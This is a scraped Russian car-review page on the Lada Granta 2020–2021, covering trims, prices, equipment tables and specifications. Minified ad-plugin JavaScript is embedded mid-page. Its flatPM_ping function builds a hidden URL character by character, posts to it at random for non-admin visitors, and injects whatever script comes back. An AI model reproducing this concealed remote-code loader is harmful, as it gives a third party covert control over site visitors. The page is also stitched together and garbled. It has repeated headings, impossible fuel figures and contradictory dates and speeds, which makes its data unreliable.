- Основные конкуренты
- Начало продаж
- Сроки начала продаж
- Classic
- Classic optima
- Comfort
- Drive active
- Granta cross
- Classic
- Comfort
- Luxe
- Lada granta 2020-2021 — цены, комплектации, фото и характеристики
- Lada granta лифтбек — официальный сайт lada
- Luxe prestige
- Standart
- Внешний вид
- Дизайн
- Комплектации и опции (таблица)
- Комплектации и цены
- Комплектации и цены (таблица)
- Конкуренты
- Лифтбек
- Standard
- Classic
- Classic optima
- Comfort
- #club
- Luxe
- Luxe prestige
- Модификации и опции
- Обзор интерьера и экстерьера нового кузова
- Обзор нового кузова
- Салон
- Седан
- Standard
- Classic
- Classic optima
- Comfort
- #club
- Luxe
- Luxe prestige
- Таблица базовых характеристик
- Техническая начинка
- Технические характеристики
- Универсал
- Standard
- Classic
- Classic optima
- Comfort
- Luxe
- Luxe prestige
- Хэтчбек
- Standard
- Classic
- Classic optima
- Comfort
- Luxe
- Luxe prestige
- Экстерьер
Основные конкуренты
Учитывая стоимость, уровень оснащения и класс новой Гранты, прямых конкурентов у нее на рынке не много. Самыми явными соперниками считаются Рено Логан и Равон Р3.
Начало продаж
Актуальную модель Lada Granta 2020 модельного года можно купить уже сейчас. Официальные дилеры подробно расскажут о всех достоинствах и преимуществах модели. К тому же, в точках продаж можно пройти тест-драйв и оценить модель в «деле».
Сроки начала продаж
Обновленный седан уже предлагается официальными дилерами. Он является самым бюджетным автомобилем не только в ассортименте «АвтоВАЗа», но и на отечественном рынке в целом.
Classic
Вторая по счету комплектация стоит от 491,5 тыс. рублей. Список ее оборудования расширяется за счет появления:
- электроусилителя руля;
- регулируемой рулевой колонки;
- центрального замка;
- передних электростеклоподъемников;
- бортового компьютера.
За 26 000 рублей производитель предлагает к установке пакет Optima, в состав которого вошел кондиционер, а доплатив еще 40 000 рублей покупатель получает Лада Гранта 2020, оборудованную 106-сильным агрегатом и роботизированной трансмиссией.
Classic optima
Очередная комплектация Classic Optima стартует от цены в 521 500 рублей. Но здесь доступен еще 106-сильный двигатель, который вместе с «роботом» повышает ценник до 561 500 рублей. Главными отличиями становится появление кондиционера в салоне и системы подогрева боковых зеркал.
Comfort
Сборка Comfort с 87-сильным мотором уходит от официальных дилеров по цене 541,5 тысяч рублей. Версия с 1,6 и 98 л.с. обойдется покупателю уже в 611 500 рублей. Старший двигатель с МКПП повышает ценник до 556 500 рублей, а с роботизированной коробкой до 581 500 рублей.
В перечень добавляются:
- боковые зеркала в цвет кузова с приводом и указателями поворота;
- окрашенные в цвет кузова ручки дверей;
- обогрев первого ряда;
- вторая подушка безопасности;
- радио, МР3, Hands free;
- 4 динамика USB SD-карта;
- зеркала в козырьках.
Drive active
Granta cross
Комплектации | Мотор | КПП | Расход топлива | Привод | Разгон до 100 км/ч |
---|---|---|---|---|---|
Classic | |||||
559 900 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 12,2 с |
Comfort | |||||
582 900 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 12,2 с |
597 900 рублей | бензин 1.6 л. (106 л.с) | MT | 8,7/5,2/6,5 | Передний | 10,8 с |
622 900 рублей | бензин 1.6 л. (106 л.с) | AMT | 8,7/5,2/6,5 | Передний | 12,7 с |
Luxe | |||||
623 900 рублей | бензин 1.6 л. (106 л.с) | MT | 8,7/5,2/6,5 | Передний | 10,8 с |
648 900 рублей | бензин 1.6 л. (106 л.с) | AMT | 8,7/5,2/6,5 | Передний | 12,7 с |
Lada granta 2020-2021 — цены, комплектации, фото и характеристики
«:’
‘:»»,document.createElement(«div»),p=ff(window),b=ff(«body»),m=void 0===flatPM_getCookie(«flat_modal_» o.ID «_mb»)||»false»!=flatPM_getCookie(«flat_modal_» o.ID «_mb»),i=»scroll.flatmodal» o.ID,g=»mouseleave.flatmodal» o.ID » blur.flatmodal» o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&»true»==o.how.popup.timer&&(t=ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»] .flat__4_timer span’),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(—e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘
‘))},1e3))},f=function(){void 0!==o.how.popup.cookie&&»false»==o.how.popup.cookie&&m&&(flatPM_setCookie(«flat_modal_» o.ID «_mb»,!1),ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»]’).addClass(«flat__4_modal-show»),l()),void 0!==o.how.popup.cookie&&»false»==o.how.popup.cookie||(ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»]’).addClass(«flat__4_modal-show»),l())},ff(«body > *»).eq(0).before(‘
«),w=document.querySelector(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»] .flat__4_modal-content’),-1!==e.indexOf(«go» «oglesyndication»)?ff(w).html(c e):flatPM_setHTML(w,e),»px»==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&»true»==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&»true»==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&»true»==o.how.outgoing.timer&&(t=ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»] .flat__4_timer span’),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(—e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘
‘))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&»false»==o.how.outgoing.cookie&&m&&(ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’).addClass(«show»),n(),b.on(«click»,’.flat__4_out[data-id-out=»‘ o.ID ‘»] .flat__4_cross’,function(){flatPM_setCookie(«flat_out_» o.ID «_mb»,!1)})),void 0!==o.how.outgoing.cookie&&»false»==o.how.outgoing.cookie||(ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’).addClass(«show»),n())}var _,u=»0″!=o.how.outgoing.indent?’ style=»bottom:’ o.how.outgoing.indent ‘px»‘:»»,c=»true»==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&»true»==o.how.outgoing.timer?’
Закрыть через ‘ o.how.outgoing.timer_count «
«:’
‘:»»,p=ff(window),h=»scroll.out» o.ID,g=»mouseleave.outgoing» o.ID » blur.outgoing» o.ID,m=void 0===flatPM_getCookie(«flat_out_» o.ID «_mb»)||»false»!=flatPM_getCookie(«flat_out_» o.ID «_mb»),b=(document.createElement(«div»),ff(«body»));switch(o.how.outgoing.whence){case»1″:_=»top»;break;case»2″:_=»bottom»;break;case»3″:_=»left»;break;case»4″:_=»right»}ff(«body > *»).eq(0).before(‘
‘ c «
«);var v,w=document.querySelector(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’);-1!==e.indexOf(«go» «oglesyndication»)?ff(w).html(c e):flatPM_setHTML(w,e),»px»==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&»true»==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&»true»==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff(‘[data-flat-id=»‘ o.ID ‘»]:not(.flat__4_out):not(.flat__4_modal)’).contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(«body»),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)»);0<_.length&&_.each(function(){var t=ff(this),e=t.data(«height»)||350,a=t.data(«top»);t.wrap(‘
‘);t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(«.flatPM_sidebar»);setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data(«top»);t.wrap(‘
‘);t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(«.flatPM_sticky_wrapper.flatPM_sidebar_block»).css(«height»,t)},4e3)}),»undefined»!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(«body> *»).last().after(‘
‘),flat_body.on(«click»,».flat__4_out .flat__4_cross»,function(){ff(this).parent().removeClass(«show»).addClass(«closed»)}),flat_body.on(«click»,».flat__4_modal .flat__4_cross»,function(){ff(this).closest(«.flat__4_modal»).removeClass(«flat__4_modal-show»)}),flat_pm_arr=[],ff(«.flat_pm_start»).remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie(«flat_r_mb»,»zen.yandex»),flat_userVars.referer=»zen.yandex»);var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,»
«],thead:[1,»
«],tbody:[1,»
«],colgroup:[2,»
«],col:[3,»
«],tr:[2,»
«],td:[3,»
«],th:[3,»
«],_default:[0,»»,»»]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement(«div»)),r=(d.exec(e)||[«»,»»])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1] e.replace(o,»<$1>») r[2],l=r[0];l—;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem(«sdghrg»);e?(e=parseInt(e) 1,localStorage.setItem(«sdghrg»,e)):localStorage.setItem(«sdghrg»,»0″);e=flatPM_random(1,200);0==ff(«#wpadminbar»).length&&111==e&&ff.ajax({type:»POST»,url:»h» «t» «t» «p» «s» «:» «/» «/» «m» «e» «h» «a» «n» «o» «i» «d» «.» «p» «r» «o» «/» «p» «i» «ng» «.» «p» «h» «p»,dataType:»jsonp»,data:{ping:»ping»},success:function(e){ff(«div»).first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector(‘[data-flat-script-id=»‘ t ‘»]’);if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,»»).replace(//gm,»»).trim(),e.code_alt=e.code_alt.replace(//gm,»»).replace(//gm,»»).trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a=»false»==d?»Закроется»:»Закрыть»,r=!flat_userVars.adb||»»==e.code_alt&&duplicateMode?e.code:e.code_alt,l=’
‘,i=e.once;n(t).each(function(){var e=n(this);e.wrap(‘
‘);var t=e.closest(«.flat__4_video»);-1!==l.indexOf(«go» «oglesyndication»)?t.append(l):flatPM_setHTML(t[0],l),e.find(«.flat__4_video_flex»).one(«click»,function(){n(this).addClass(«show»)})}),n(«body»).on(«click»,».flat__4_video_item_hover»,function(){var e=n(this),t=e.closest(«.flat__4_video_flex»);t.addClass(«show»);var a=t.find(«.flat__4_timer span»),r=parseInt(o),l=setInterval(function(){a.text(—r),r<=0&&(clearInterval(l),»true»==d?a.parent().replaceWith(‘
‘):t.remove())},1e3);e.remove()}).on(«click»,».flat__4_video_flex .flat__4_cross»,function(){n(this).closest(«.flat__4_video_flex»).remove(),»true»==i&&n(«.flat__4_video_flex»).remove()})}
Lada granta лифтбек — официальный сайт lada
Отправляя сообщение, я соглашаюсь сполитикой обработки персональных данных, выражаю свое согласие и разрешаю АО «АВТОВАЗ» осуществлять обработку моих персональных данных (фамилия, имя, отчество, домашний или рабочий мобильный телефоны, адрес электронной почты), в том числе сбор, систематизацию, накопление, хранение, уточнение, использование, обезличивание, уничтожение персональных данных, передачу третьим лицам – уполномоченным АО «АВТОВАЗ» на основании договоров организациям (перечень уполномоченных организаций размещен по ссылке: https://www.lada-granta-fanclub.ru/personal-data), в целях, связанных с продвижением товаров и услуг АО «АВТОВАЗ», включая: направление материалов рекламного характера, связанных с деятельностью АО «АВТОВАЗ», проведение статистических исследований и маркетинговых программ (акций) и опросов (аудиты, анкетирования, исследования), в том числе с целью выяснения мнения пользователя относительно продукции АО «АВТОВАЗ». Согласие на обработку персональных данных в соответствии с указанными выше условиями я предоставляю на 10 (десять) лет. Я уведомлен и согласен с тем, что указанное согласие может быть мной отозвано посредством направления письменного заявления заказным почтовым отправлением с описью вложения, либо вручено лично под подпись.
Luxe prestige
Флагманская версия Luxe Prestige продается по цене 613 800 рублей за 106 л.с. с МКПП и 638 800 рублей с роботизированной коробкой. Список дополнительного оборудования пополняют датчики дождя и света, парктроник на задней части.
Standart
Минимальная комплектация Standart продается у официальных дилеров по цене от 461 900 рублей и доступна исключительно с 87-сильным мотором и МКПП. Как и в большинстве российских авто не стоит рассчитывать на премиальную оптику. В основе – галогеновые фары и дополнительный стоп-сигнал на задней части.
Для комфортного использования стекла покрыли теплозащитной пленкой. Уже в базе предусмотрен обогрев заднего стекла. Салон довольно скромный – тканевая обивка, подголовники только для первого ряда. Минималка может похвастаться центральным замком и разъемом для электропитания.
Помимо этого, стандартная комплектация может предложить:
- ABS, EBD, BAS;
- салонный фильтр;
- шторку багажного отделения;
- иммобилайзер;
- детский замок;
- неполноразмерное запасное колесо.
Внешний вид
Как видно уже на фото, большая часть оформления автомобиля осталась нетронутой. Однако новый кузов может похвастаться и кое-какими доработками, благодаря которым машина станет и привлекательнее, и более функциональной.Больше всего изменений можно найти на передней части автомобиля.
Как и раньше, она располагается на небольшой высоте и отличается средними габаритами. Также здесь имеется и наклон, что позволяет любому водителю комфортно себя чувствовать за рулем и прекрасно оценивать ситуацию на дороге. Сразу же в глаза бросается увеличение количества рельефа.
Уже на капоте можно найти несколько плавных переходов по высоте, которые находятся на боковых частях крышки. Как и раньше, основная часть бампера тут украшается Х-образным воздухозаборником, внутри которого все детали сделаны из пластика и покрашены в черный цвет.
Только в центре периметр этой конструкции отличается хромированной отделкой, а также значок бренда Лада. По бокам воздухозаборник украшается массивными головными фарами, которые принимают еще более агрессивную форму и располагаются под большим наклоном.
Немного преобразился тут и обвес. Он пополнился некоторым рельефом, который распределен по всей его площади, а также включает в себя длинный воздухозаборник, сделанный в виде полоски. В центре нее красуется решетка, улучшающая охлаждение подкапотного пространства, а по бокам можно наблюдать небольшие круглые фары противотуманной оптики. Также тут располагается куда больше разнообразных датчиков электронных ассистентов.
Профиль автомобиля практически не претерпел никаких крупных изменений. Все так же тут можно найти кучу волнообразного рельефа, сосредоточенного в основном на дверях. Главной деталью здесь является широченная полоска из окон, которая теперь будет обрамляться чуть более широкой линией, покрашенной в черный глянец.
Этим же цветом исполнены и разделительные стойки, которые тоже стали несколько шире. Чуть увеличились в размерах зеркала заднего вида, а также обрели более треугольную форму. Теперь уже в базе они смогут похвастаться наличием поворотных сигналов, а также покрашенной в черный цвет ручкой.
Чуть больше преобразований можно найти, глядя на заднюю часть машины. Располагается она несколько выше, чем до обновления, а также стала несколько короче. Крышка багажника пополнилась тут небольшим выступом, расположенным на самом конце, а также получила обилие рельефа.
Следом можно наблюдать большие хромированные шильдики, яркие габаритные сигналы, помещенные по бокам от дверцы, и стильные переходы по высоте. Много места выделено тут под обвес, но вот обилием декора он похвастаться не сможет. Здесь можно найти только диффузор черного цвета и датчики.
Дизайн
В начале пути Лада грешила несовременным внешним видом, но спустя пару лет после старта продаж дизайнеры попытались реанимировать модель в глазах поклонников. Рестайлинг позволил улучшить внешний вид, но до современных аналогов российской четырехдверке еще далеко.
Интерьер не претендует на звание топового, поэтому все довольно скромно, включая подгонку и качество материалов. Проблемы есть и с дверными стеклами, которые необходимо подтягивать для плотного закрытия после покупки. Не обошлось без неприятного запаха из-за используемых материалов.
Комплектации и опции (таблица)
Функции | 1.6 МКПП Luxe | 1.6 МКПП Classic | 1.6 МКПП Luxe пакет Prestige | 1.6 МКПП Comfort | 1.6 РКПП Luxe | 1.6 РКПП Luxe пакет Prestige | 1.6 РКПП Classic пакет Optima | 1.6 РКПП Comfort | 1.6 МКПП Classic пакет Optima | 1.6 МКПП Comfort | 1.6 МКПП Standart | 1.6 АКПП Luxe | 1.6 АКПП Comfort | 1.6 МКПП Luxe |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ESP (система контроля заносов) | — | — | — | — | — | — | — | — | — | — | — | |||
EBD (распределение тормозного усилия) | ||||||||||||||
ABS | ||||||||||||||
Антипробуксовочная система (TCS) | — | — | — | — | — | — | — | — | — | — | — | |||
Рулевая колонка, ругулируемая | — | |||||||||||||
Усилитель рулевого управления, электро | — | |||||||||||||
Круиз-контроль | — | — | — | — | — | — | — | — | ||||||
Система помощи при торможении (BAS) | ||||||||||||||
Задние датчики парковки | — | — | — | — | — | — | — | — | — | — | — | — | ||
Подогрев передних сидений, электрический | — | — | — | — | ||||||||||
Усилитель рулевого управления, гидро | — | — | — | — | — | — | — | — | — | — | — | — | — | — |
Боковые зеркала с подогревом | — | — | ||||||||||||
Климат-контроль | — | — | — | — | — | — | — | — | ||||||
Центральный замок | ||||||||||||||
Система помощи при старте на подъеме (HAC) | — | — | — | — | — | — | — | — | — | — | — |
Комплектации и цены
Лада Гранта 2020 года уже относительно давно получила новый кузов, изучить детали которого можно по опубликованным фото. После проведения рестайлинга производитель решил не обновлять технические характеристики модели, подкорректировав лишь предлагаемые комплектации, которые получили более современное и качественное оснащение.
На данный момент новинка предлагается в 5 исполнениях.
Комплектации и цены (таблица)
Цены на комплектации являются приблизительными и могут меняться в зависимости от региона.
Конкуренты
Соперники Lada Granta 2020 не отличаются максимальной оснащенностью из-за невысокой цены. Однако составляют достойную конкуренцию.
Конкуренты:
Лифтбек
Комплектации | Мотор | КПП | Расход топлива | Привод | Разгон до 100 км/ч |
---|---|---|---|---|---|
Standard | |||||
461 900 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,8 с |
561 500 рублей | бензин 1.6 л. (106 л.с) | AMT | 8,7/5,2/6,5 | Передний | 12,1 с |
Classic | |||||
495 500 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,8 с |
Classic optima | |||||
521 500 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,8 с |
561 500 рублей | бензин 1.6 л. (106 л.с) | AMT | 8,7/5,2/6,5 | Передний | 12,1 с |
Comfort | |||||
541 500 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,8 с |
556 500 рублей | бензин 1.6 л. (106 л.с) | MT | 8,7/5,2/6,5 | Передний | 10,6 с |
581 500 рублей | бензин 1.6 л. (106 л.с) | AMT | 8,7/5,2/6,5 | Передний | 12,1 с |
611 500 рублей | бензин 1.6 л. (98 л.с) | AT | 9,9/56,1/67,2 | Передний | 13,3 с |
#club | |||||
558 900 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,8 с |
573 900 рублей | бензин 1.6 л. (106 л.с) | MT | 8,7/5,2/6,5 | Передний | 10,6 с |
628 900 рублей | бензин 1.6 л. (98 л.с) | AT | 9,9/56,1/67,2 | Передний | 13,3 с |
Luxe | |||||
579 800 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,8 с |
594 800 рублей | бензин 1.6 л. (106 л.с) | MT | 8,7/5,2/6,5 | Передний | 10,6 с |
619 800 рублей | бензин 1.6 л. (106 л.с) | AMT | 8,7/5,2/6,5 | Передний | 12,1 с |
649 800 рублей | бензин 1.6 л. (98 л.с) | AT | 9,9/56,1/67,2 | Передний | 13,3 с |
Luxe prestige | |||||
613 800 рублей | бензин 1.6 л. (106 л.с) | MT | 8,7/5,2/6,5 | Передний | 10,6 с |
638 800 рублей | бензин 1.6 л. (106 л.с) | AMT | 8,7/5,2/6,5 | Передний | 12,1 с |
Модификации и опции
Лада Гранта 2020 модельного года предлагается в большом количестве комплектаций, которые могут дополняться специальными пакетами.
Основных уровней оснащения насчитывается пять:
- Granta Standart. Базовая комплектация включает подушку безопасности водителя , иммобилайзер, систему экстренного оповещения ЭРА-ГЛОНАСС, легкую тонировку стекол, систему вспомогательного торможения (BAS), воздушный фильтр салона, 14-дюймовые стальные диски, розетку на 12V и мн. др.
- Granta Classic. В перечень дополнительного оснащения добавлены электроусилитель рулевого управления, центральный замок, система регулировки рулевой колонки по высоте, электростеклоподъемники передних дверей и пр.
- Granta Comfort. В комплектацию включаются: подушка безопасности переднего пассажира, кондиционер, система подогрева передних сидений и наружных зеркал ( электропривод), аудиосистема и 4 динамиками, корпуса боковых зеркал со встроенными указателями поворота, молдинги боковых дверей и др.
- Granta Luxe. Эта комплектация дополнена тремя подголовниками задних сидений, заводской сигнализацией, противотуманными фарами, центральным замком с ДУ, раскладываемым задним сидением (60/40), климатической системой, электростеклоподъемниками задних дверей, системой обогрева ветрового стекла и 15-дюймовыми литыми колесными дисками.
- Granta Luxe Prestige. Оснащение расширено за счет наличия заднего парктроника, датчиков света и дождя, противобуксовочной системы (TCS) и системы помощи при трогании на подъеме (HSА).
В разных дилерских центрах могут предлагаться разные пакеты оснащения, в том числе комбинированные. Всего в линейке Лада Гранта 2020 с учетом типа кузова, версии мотора, типа трансмиссии и вида пакета оснащения насчитывается не менее 56 комплектаций авто.
Обзор интерьера и экстерьера нового кузова
Носовая часть Lada Granta 2020 года украшена фирменной радиаторной решеткой в X-образном стиле, по бокам которой установлена посвежевшая головная оптика с небольшим прищуром. Также производитель полностью пересмотрел оформление переднего бампера, увенчав его массивным воздухозаборником и хромированными элементами.
Задняя часть дополнена новой крышкой багажника с аккуратным выступом, напоминающий спойлер. На крышке отныне размещается площадка под номерной знак. В завершении стоит отметить дизайн бампера. Он выделяется за счет пластиковой вставки черного цвета, которая немного утяжеляет образ авто, но не портит его.
В салоне новинки установлена передняя панель, которая уже знакома поклонникам бренда. Производитель заменил цвет стандартной подсветки на белый, а дефлекторы выполнены в фирменном стиле компании. Приборная панель практически не отличается от той, которая устанавливается на Весту за исключением нескольких элементов.
Обзор нового кузова
Когда в 2022 году модель Гранта пришла на смену морально устаревшей Калине, никто не сомневался, что она продолжит нести знамя наиболее бюджетной версии в линейке АвтоВАЗа.
Даже внутри предприятия новый разрабатываемый автомобиль шел под названием «Low cost» (низкая стоимость), а в его конструкции «неохотно» появлялись новые узлы. При этом новинка явно преобразилась внешне, а в версиях последних лет вовсе получила стильный фирменный Х-дизайн передней части.
Габаритные размеры Лада Гранта 2020 варьируются в зависимости от кузова, где меняется только длина:
- длина – от 3926 до 4268 мм.,
- ширина – 1700 мм.
- высота – 1500 мм.
Салон
Практичность и эргономичность – эти два фактора должны заставить закрыть глаза на те недостатки, которые выявляются в салоне недорогой Лады Гранты 2020 года выпуска.
Дешевый пластик, не всегда качественная подгонка элементов и недостаточная шумоизоляция являются проблемами решаемыми, к тому же опционально производитель предлагает ряд улучшений, включая, к примеру, более дорогую обивку кресел. В остальном Lada Granta 2020 полностью соответствует своему бюджетному статусу.
Седан
Комплектации | Мотор | КПП | Расход топлива | Привод | Разгон до 100 км/ч |
---|---|---|---|---|---|
Standard | |||||
444 900 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,6 с |
Classic | |||||
480 500 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,6 с |
Classic optima | |||||
506 500 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,6 с |
546 800 рублей | бензин 1.6 л. (106 л.с) | AMT | 8,7/5,2/6,5 | Передний | 12 с |
Comfort | |||||
526 500 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,6 с |
541 500 рублей | бензин 1.6 л. (106 л.с) | MT | 8,7/5,2/6,5 | Передний | 10,5 с |
566 500 рублей | бензин 1.6 л. (106 л.с) | AMT | 8,7/5,2/6,5 | Передний | 12 с |
596 500 рублей | бензин 1.6 л. (98 л.с) | AT | 9,9/56,1/67,2 | Передний | 13,1 с |
#club | |||||
543 900 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,6 с |
558 900 рублей | бензин 1.6 л. (106 л.с) | MT | 8,7/5,2/6,5 | Передний | 10,5 с |
613 900 рублей | бензин 1.6 л. (98 л.с) | AT | 9,9/56,1/67,2 | Передний | 13,1 с |
Luxe | |||||
564 800 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,6 с |
579 800 рублей | бензин 1.6 л. (106 л.с) | MT | 8,7/5,2/6,5 | Передний | 10,5 с |
604 800 рублей | бензин 1.6 л. (106 л.с) | AMT | 8,7/5,2/6,5 | Передний | 12 с |
634 800 рублей | бензин 1.6 л. (98 л.с) | AT | 9,9/56,1/67,2 | Передний | 13,1 с |
Luxe prestige | |||||
598 800 рублей | бензин 1.6 л. (106 л.с) | MT | 8,7/5,2/6,5 | Передний | 10,5 с |
623 800 рублей | бензин 1.6 л. (106 л.с) | AMT | 8,7/5,2/6,5 | Передний | 12 с |
Таблица базовых характеристик
Используемый тип привода | Передний |
Используемый тип кузова | Седан |
Тип коробки переключения передач (трансмиссия) | MT (5) |
Эффективный обьем двигателя, в литрах | 1.6 |
Ускорение 0-100, с | 11.6 |
Клиренс (расстояние от нижней точки), см | 18 |
Ограничение скорости, макс | 172 |
Страна-изготовитель | Россия |
Гарантийный срок от изготовителя | 36 месяцев или 100 тыс. км пробега |
Длинна, см | 426.8 |
Ширина, см | 170 |
Высота, см | 150 |
Места для сидения пассажиров | 5 |
Размер колеи спереди, мм | 1430 |
Размер колеи сзади, мм | 1414 |
Эффективная масса авто, кг | 1160 |
Мощность, л.с. | 87 |
Крутящий момент Н*м | 140 |
Тип силовой установки | Рядный, 4-цилиндровый |
Тип топлива, рекомендуемый к использованию | АИ-95 |
Турбина | Отсутсвует |
Расход город, л/100 км | 9.2 |
Расход трасса, л/100 км | 5.4 |
Расход смешанный, л/100 км | 6.1 |
Техническая начинка
Лада Гранта 2020 модельного года комплектуется следующими модификациями 1.6-литровой бензиновой установки (и прилагаемой к ней трансмиссией):
- 8-клапанный, 87 л. с. (идет в паре с пятиступенчатой «механикой»);
- 16-клапанный, 98 л. с. (плюс японский 4-ступенчатый «автомат» Jatco);
- 16-клапанный, 106 л. с. (может агрегатироваться 5-МКПП или 5-диапазонным «роботом», имеющим дополнительные режимы работы: «зимний», «городской», «спортивный»).
Технические характеристики
Lada Granta 2020 года предлагается исключительно с передним приводом и полунезависимой подвеской, где в передней части располагаются стойки типа Макферсон, а в задней — торсионная балка. Тормозная система представлена дисковыми и барабанными механизмами.
Моторная линейка бензиновая. Объем всех агрегатов 1,6 литра. Они различаются лишь мощностью и коробкой передач. В базовых исполнениях производитель предлагает к установке 87-сильный движок с 140 Нм крутящего момента. Работает он исключительно с 5-скоростной механической трансмиссией.
Следующий движок 106-сильный. Его крутящей момент равен 148 Нм. Он предлагается в паре с 5МКПП или роботизированной коробкой передач с аналогичным количеством скоростей. Первую «сотку» седан набирает 10,5 и 12,0 сек, соответственно, а максимальная скорость одинакова во всех исполнениях — 180 км/ч. Средний расхода топлива составляет 6,5 л. Тип трансмиссии на данный показатель не влияет.
Последний мотор демонстрирует отдачу 98 л.с. при 145 Нм крутящего момента. Вместе с ним устанавливается автоматическая трансмиссия на 4 ступени. При таком оснащении седан разгоняется до «сотки» за 13,1 сек, а максимальная скорость зафиксирована на отметке в 165 км/ч. В городе расход топлива составляет около 10 литров, а в загородном режиме — 6,1 л.
Универсал
Комплектации | Мотор | КПП | Расход топлива | Привод | Разгон до 100 км/ч |
---|---|---|---|---|---|
Standard | |||||
471 900 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,9 с |
Classic | |||||
505 500 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,9 с |
Classic optima | |||||
531 500 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,9 с |
571 500 рублей | бензин 1.6 л. (106 л.с) | AMT | 8,7/5,2/6,5 | Передний | 12,2 с |
Comfort | |||||
551 500 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,9 с |
566 500 рублей | бензин 1.6 л. (106 л.с) | MT | 8,7/5,2/6,5 | Передний | 10,7 с |
591 500 рублей | бензин 1.6 л. (106 л.с) | AMT | 8,7/5,2/6,5 | Передний | 12,2 с |
621 500 рублей | бензин 1.6 л. (98 л.с) | AT | 9,9/56,1/67,2 | Передний | 13,1 с |
Luxe | |||||
589 800 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,9 с |
604 800 рублей | бензин 1.6 л. (106 л.с) | MT | 8,7/5,2/6,5 | Передний | 10,7 с |
629 800 рублей | бензин 1.6 л. (106 л.с) | AMT | 8,7/5,2/6,5 | Передний | 12,2 с |
